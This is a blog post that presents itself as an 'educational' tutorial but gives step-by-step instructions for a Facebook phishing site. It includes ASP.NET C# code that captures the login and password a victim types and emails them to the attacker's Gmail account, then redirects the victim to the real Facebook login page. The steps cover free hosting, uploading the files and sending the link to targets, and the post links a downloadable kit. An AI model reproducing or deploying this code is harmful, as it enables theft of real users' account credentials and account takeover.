RSS

Facebook Phishing Attack Educational Tutorial(5 Steps)


I have created A facebook Page in asp.net. you can easily use it for phishing its very simple easy and cool.
what you have to do only change your email ids and passwords in the code and upload it to somee.com and you have done..


STEP 1
go to Somee.com and register for free account.
They give you ftp account with details
more details read this.

STEP 2

Open the zip file which You download from the Bottom Of the Post.
and open default.aspx.cs in Notepad and change the following code


protected void Button1_Click(object sender, EventArgs e)
    {
        // By Nishant Srivastava
   
        obj_EMails.sendemail("geekstrack@gmail.com", "You Have A Victim", "From :" + TextBox1.Text + "
Password : " + TextBox2.Text);
        Response.Redirect("http://www.facebook.com/login.php");
    }


in place of geekstrack@gmail.com use your gmail address where password is transfered.

STEP 3

Now open Emailer.cs File in note pad  available in zip

public class Emailer
{
    SmtpClient client = new SmtpClient();
    System.Net.Mail.MailMessage msg = new System.Net.Mail.MailMessage();

    System.Net.NetworkCredential credentials = new System.Net.NetworkCredential("geekstrack@gmail.com", "mypassword");



    public void sendemail(string sendto, string subject, string body)
    {
        try
        {
            client.Host = "smtp.gmail.com";
            // client.Host = "smtpout.secureserver.net";
            client.Port = 587;
            client.UseDefaultCredentials = false;
            client.Credentials = credentials;
            client.EnableSsl = false;
            // convert strings to mail address

            MailAddress to = new MailAddress(sendto);
            MailAddress from = new MailAddress("geekstrack@gmail.com");

            //
            msg.IsBodyHtml = true;
            msg.Subject = subject;
            msg.Body = body;
            msg.To.Add(to);
            msg.From = from;


            client.Send(msg);

        }
        catch (Exception ex)
        {
            ex.ToString();
        }
    }
}
Find "geekstrack@gmail.com" replace with your email from both place, and  "mypassword" with your gmail password
NOTE: I suggest you to create a New Gmail account to use this hack.


STEP 4
download filezilla to upload your site.


STEP 5
Now send URL to anyone.

Download Site
fakebooklogin.rar
 Download



0 Responses to "Facebook Phishing Attack Educational Tutorial(5 Steps)"

Post a Comment

 
Return to top of page Copyright © 2010 | Flash News Converted into Blogger Template by Everything About Blogging